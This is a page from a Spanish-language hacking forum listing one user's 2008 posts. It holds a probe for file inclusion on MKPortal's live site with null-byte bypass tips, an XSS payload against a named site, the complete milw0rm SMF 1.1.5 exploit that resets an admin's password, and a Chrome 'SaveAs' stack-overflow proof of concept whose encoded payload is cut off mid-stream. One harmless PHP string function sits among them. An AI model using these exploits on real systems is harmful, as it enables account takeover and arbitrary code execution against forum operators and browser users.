elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: 1 ... 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 [426] 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 ... 456
4251  Seguridad Informática / Nivel Web / Re: Posible inclusión remota de archivos en MKPortal en: 9 Septiembre 2008, 07:32 am
Referencia:
http://www.jccharry.com/fake/1.txt

Se sabe que el archivo está ahí por el error que arroja:
Citar
Warning: require_once(content/fuck.php) [function.require-once]: failed to open stream: No such file or directory in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/index.php on line 150

Fatal error: require_once() [function.require]: Failed opening required 'content/fuck.php' (include_path='.:/usr/local/lib/php') in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/index.php on line 150

por lo cual el archivo que está tratando de incluir "show=fake" "content/fuck.php" falla, si hacemos un "show=copyright" entonces suponemos que está en "content/copyright.php"

Un null byte es un byte nulo, por ejemplo en un explordor se escribe %00 o simplemente un cero para bases de datos y en algunos casos proboca que un filtro no funcione adecuadamente ya que un byte nulo significa el término del buffer pero nosotros continuamos mas allá, te explico mejor...

"hola, como estás"
Para algunas funciones eso significa una palabra completa

"hola, %00 como estás"
Para algunas funciones la palabra termina hasta donde no haya bytes, o sea un byte nulo, eso significa que para la función la palabra termina después de la coma y no hay nada mas, eso significa que después de eso no es filtrado y podemos ejecutar sentencias mysql o de inclusiones debido a filtros diseñados con explode, eregi, preg, etc.

Estyo sucede muy a menudo al no deshabilitar el ingreso de bytes nulos desde el mismo script.

En la programación de visual basic se escribe "chr(0)", en C++ se escribe "\x00", en php, perl es lo mismo y en exploradores es en urlencode, o sea "%00".

http://www.google.cl/search?hl=es&q=null+byte+vulnerability&btnG=Buscar+con+Google&meta=
4252  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 9 Septiembre 2008, 06:47 am
Se ve bueno el sitio.

Código:
http://chromekb.com/vulnerabilities/"><h1>ARREGLENMEE!</h1>






fuente:
http://www.jccharry.com/fake/1.txt
4253  Programación / PHP / Recortar palabras largas en: 7 Septiembre 2008, 21:14 pm
Estaba realizando unas funciones propias para un sistema que estoy haciendo y quería compartirlo con ustedes si es que agún dia tienen la misma necesidad:

Código
  1. <?php
  2. $palabra = "1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950";
  3. echo whk_recorta($palabra,10);
  4. /* Resultado: 1234567891...4647484950 */
  5.  
  6. function whk_recorta($palabra,$limite){
  7. if($limite < 1){
  8.  return $palabra;
  9. }
  10. if(strlen($palabra)>(($limite * 2) + 1)){
  11.  for($cuenta=0;$cuenta<$limite;$cuenta++){
  12.   $palabra_final .= $palabra[$cuenta];
  13.  }
  14.  $palabra_final .= "...";
  15.  for($cuenta = (strlen($palabra) - $limite); $cuenta <= strlen($palabra); $cuenta++){
  16.   $palabra_final .= $palabra[$cuenta];
  17.  }
  18.  return $palabra_final;
  19. }else{
  20.  return $palabra;
  21. }
  22. }
  23. ?>

De esta forma se recortan hacia ambos lados... derecha e isquierda.
4254  Seguridad Informática / Nivel Web / Posible inclusión remota de archivos en MKPortal en: 7 Septiembre 2008, 20:24 pm
Estaba mirando el sitio oficial de mkportal y pude ver que para visualizar una sección utiliza inclusiones hacia el archivo con el nombre de la variable "show" + .php
Por ejemplo:
Código:
http://www.mkportal.es/mkportal/modules/docs/index.php?show=copyright

En realidad está haciendo una inclusión hacia:
Código:
http://www.mkportal.es/mkportal/modules/docs/content/copyright.php

En el cual no verifica si realmente puede ser incluido o existe aquella página como se ve en el siguiente ejemplo:
Código:
http://www.mkportal.es/mkportal/modules/docs/index.php?show=fuck
Citar
Warning: require_once(content/fuck.php) [function.require-once]: failed to open stream: No such file or directory in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/index.php on line 150

Fatal error: require_once() [function.require]: Failed opening required 'content/fuck.php' (include_path='.:/usr/local/lib/php') in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/index.php on line 150

Y si hacemos una petición GET directamente a un archivo nos resulta..
Código:
http://www.mkportal.es/mkportal/modules/docs/content/copyright.php
Citar
Fatal error: Class 'module' not found in /home/mkportal/domains/mkportal.es/public_html/mkportal/modules/docs/content/copyright.php on line 6

Aumentando las probabilidades de una inclusión remota o talves solo local. Probé inyectando null bytes para evadir la extensión pero no fue posible, si ingresas un punto, slqsh o algún caracter que no sea número o letra te lo toma como nó válido, a exepción de un byte nulo como "%00" asi que el resto será solo cosa de imaginación.

REFERENCIA:
http://www.jccharry.com/fake/1.txt
4255  Seguridad Informática / Nivel Web / Re: Quieres ser admin en un foro SMF 1.1.5? en: 7 Septiembre 2008, 18:16 pm
Recuerda que solo funciona para SMF que esté montado en un servidor con windows debido a su limitación de la generación de números al azar con la función rand().

se usa mas masomenos así:
Código:
php ./smf.php www.foro.com / --userid=1

Donde se supone que el id 1 es el admin, puedes posicionar el mouse sobre el nick del admin de un foro y abajo te aparecerá el número de id en la variable "u" que por lo general es 1.

Lo que hace el exploit es un crackeo de la clave insegura que debuelve al resetear el password de alguien aprobechandose de la cantidad limitada por windows para generar tal código y por eso es que no funciona en foros que están montados sobre un servidor con Linux.

Citar
yan@yan-desktop:~/Escritorio$ php ./smf.php
---------------------------------------------------------------
SMF <= 1.1.5 Admin Reset Password Exploit (win32-based servers)
(c)oded by Raz0r (http://Raz0r.name/)
---------------------------------------------------------------
USAGE:
~~~~~~
php ./smf.php [host] [path] OPTIONS

[host] - target server where SMF is installed
[path] - path to SMF

OPTIONS:
--userid=[value] (default: 1)
--username=[value] (default: admin)
examples:
php ./smf.php site.com /forum/
php ./smf.php site.com / --userid=2 --username=odmen
yan@yan-desktop:~/Escritorio$
4256  Seguridad Informática / Nivel Web / Quieres ser admin en un foro SMF 1.1.5? en: 7 Septiembre 2008, 04:57 am
El único inconveniente es que funciona para servidores que corren con Window$  :P (windows pwned!)

código:
Código
  1. <?php
  2. echo "---------------------------------------------------------------\n";
  3. echo "SMF <= 1.1.5 Admin Reset Password Exploit (win32-based servers)\n";
  4. echo "(c)oded by Raz0r (http://Raz0r.name/)\n";
  5. echo "---------------------------------------------------------------\n";
  6.  
  7. if ($argc<3) {
  8.   echo "USAGE:\n";
  9.   echo "~~~~~~\n";
  10.   echo "php {$argv[0]} [host] [path] OPTIONS\n\n";
  11.   echo "[host] - target server where SMF is installed\n";
  12.   echo "[path] - path to SMF\n\n";
  13.   echo "OPTIONS:\n";
  14.   echo "--userid=[value] (default: 1)\n";
  15.   echo "--username=[value] (default: admin)\n";
  16.   echo "examples:\n";
  17.   echo "php {$argv[0]} site.com /forum/\n";
  18.   echo "php {$argv[0]} site.com / --userid=2 --username=odmen\n";
  19.   die;
  20. }
  21.  
  22. /**
  23. * Software site: http://www.simplemachines.org
  24. *
  25. * SMF leaks current state of random number generator through hidden input parameter `sc`
  26. * of the password reminder form:
  27. *
  28. * $_SESSION['rand_code'] = md5(session_id() . rand());
  29. * $sc = $_SESSION['rand_code'];
  30. *
  31. * Since max random number generated with rand() on win32 is 32767 and session id
  32. * is known an attacker can reverse the md5 hash and get the random number value.
  33. * On win32 every random number generated with rand() is used as a seed for the next
  34. * random number. So if SMF is installed on win32 platform an attacker can predict
  35. * all the next random numbers. When password reset is requested SMF uses rand()
  36. * function to generate validation code:
  37. *
  38. * $password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10);
  39. *
  40. * So prediction of the validation code is possible and an atacker can set his
  41. * own password for any user.
  42. *
  43. * More information about random number prediction:
  44. * http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/
  45. *
  46. * More information about the behaviour of rand() on win32 (in Russian):
  47. * http://raz0r.name/articles/magiya-sluchajnyx-chisel-chast-2/
  48. */
  49.  
  50. ini_set("max_execution_time",0);
  51. ini_set("default_socket_timeout",10);
  52.  
  53. $host = $argv[1];
  54. $path = $argv[2];
  55.  
  56. for($i=3;$i<=$argc;$i++){
  57.   if(isset($argv[$i]) && strpos($argv[$i],"--userid=")!==false) {
  58.       list(,$userid) = explode("=",$argv[$i]);
  59.   }
  60.   if (isset($argv[$i]) && strpos($argv[$i],"--username=")!==false) {
  61.       list(,$username) = explode("=",$argv[$i]);
  62.   }
  63. }
  64.  
  65. if(!isset($userid))$userid="1";
  66. if(!isset($username))$username="admin";
  67.  
  68. $sess = md5(mt_rand());
  69. echo "[~] Connecting to $host ... ";
  70. $ock = fsockopen($host,80);
  71. if($ock) echo "OK\n"; else die("failed\n");
  72.  
  73. $packet = "GET {$path}index.php?action=reminder HTTP/1.1\r\n";
  74. $packet.= "Host: {$host}\r\n";
  75. $packet.= "Cookie: PHPSESSID=$sess;\r\n";
  76. $packet.= "Keep-Alive: 300\r\n";
  77. $packet.= "Connection: keep-alive\r\n\r\n";
  78.  
  79. fputs($ock, $packet);
  80.  
  81. while(!feof($ock)) {
  82.   $resp = fgets($ock);
  83.   preg_match('@name="sc" value="([0-9a-f]+)"@i',$resp,$out);
  84.   if(isset($out[1])) {
  85.       $md5 = $out[1];
  86.       break;
  87.   }
  88. }
  89.  
  90. if($md5) {
  91.   $seed = getseed($md5);
  92.   if($seed) {
  93.       echo "[+] Seed for next random number is $seed\n";
  94.   } else die("[-] Can't calculate seed\n");
  95. }
  96. else die("[-] Random number hash not found\n");
  97.  
  98. function getseed($md5) {
  99.   global $sess;
  100.   for($i=0;$i<=32767;$i++){
  101.       if($md5 == md5($sess . $i)) {
  102.           return $i;
  103.       }
  104.   }
  105. }
  106.  
  107. $sc = md5($sess . $seed);
  108. $data   = "user=".urlencode($username)."&sc=$sc";
  109. $packet = "POST {$path}index.php?action=reminder;sa=mail HTTP/1.1\r\n";
  110. $packet.= "Host: {$host}\r\n";
  111. $packet.= "Cookie: PHPSESSID=$sess;\r\n";
  112. $packet.= "Connection: close\r\n";
  113. $packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
  114. $packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
  115. $packet.= $data;
  116.  
  117. fputs($ock, $packet);
  118.  
  119. $resp='';
  120. while(!feof($ock)) {
  121.   $resp .= fgets($ock);
  122. }
  123.  
  124. if(preg_match("@HTTP/1.(0|1) 200 OK@i",$resp)===false) {
  125.   die("[-] An error ocurred while requesting validation code\n");
  126. }
  127.  
  128. if(strpos($resp,"javascript:history.go(-1)")!==false) {
  129.   die("[-] Invalid username\n");
  130. }
  131.  
  132. srand($seed);
  133. for($i=0;$i<6;$i++){
  134.   rand();
  135. }
  136. $password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10);
  137. echo "[+] Success! To set password visit this link:\nhttp://{$host}{$path}index.php?action=reminder;sa=setpassword;u={$userid};code=$password\n";
  138. ?>
  139.  
  140. # milw0rm.com [2008-09-06]

Fuentes:
http://milw0rm.com/exploits/6392
http://www.jccharry.com/blog/2008/09/07/whk_vulnerabilidad-en-sistema-de-foros-smf-115-y-versiones-anteriores.html
4257  Seguridad Informática / Bugs y Exploits / Re: Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 6 Septiembre 2008, 01:26 am
desbordamiento de la memoria y la ejecución arbitraria de código..

Código
  1. <!--
  2. This file is saved as "Unicode" type because Chrome convert data (payload) to "Unicode" while handling. This PoC Code execute a calculator.
  3.  
  4. Here comes details :
  5.  
  6. We (SVRT-Bkis) have just discovered vulnerability in Google Chrome 0.2.149.27 and would like to inform you with this.
  7.  
  8. The vulnerability is caused due to a boundary error when handling the “SaveAs” function. On saving a malicious page with an overly long title (<title> tag in HTML), the program causes a stack-based overflow and makes it possible for attackers to execute arbitrary code on users’ systems.
  9.  
  10. To exploit the Vulnerability, a hacker might construct a specially crafted Web page, which contains malicious code. He then tricks users into visiting his Website and convinces them to save this Page. Right after that, the code would be executed, giving him the privilege to make use of the affected system.
  11.  
  12. Tested on Google Chrome (Language: Vietnamese) on Windows XP SP2.
  13.  
  14. Discoverer : Le Duc Anh - SVRT - Bkis
  15. SVRT, which is short for Security Vulnerability Research Team, is one of Bkis researching groups. SVRT specializes in the detection, alert and announcement of security vulnerabilities in software, operating systems, network protocols and embedded systems…
  16.  
  17. Website : http://security.bkis.vn
  18. Mail : svrt[at]bkav.com.vn
  19. -->
  20.  
  21. &#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&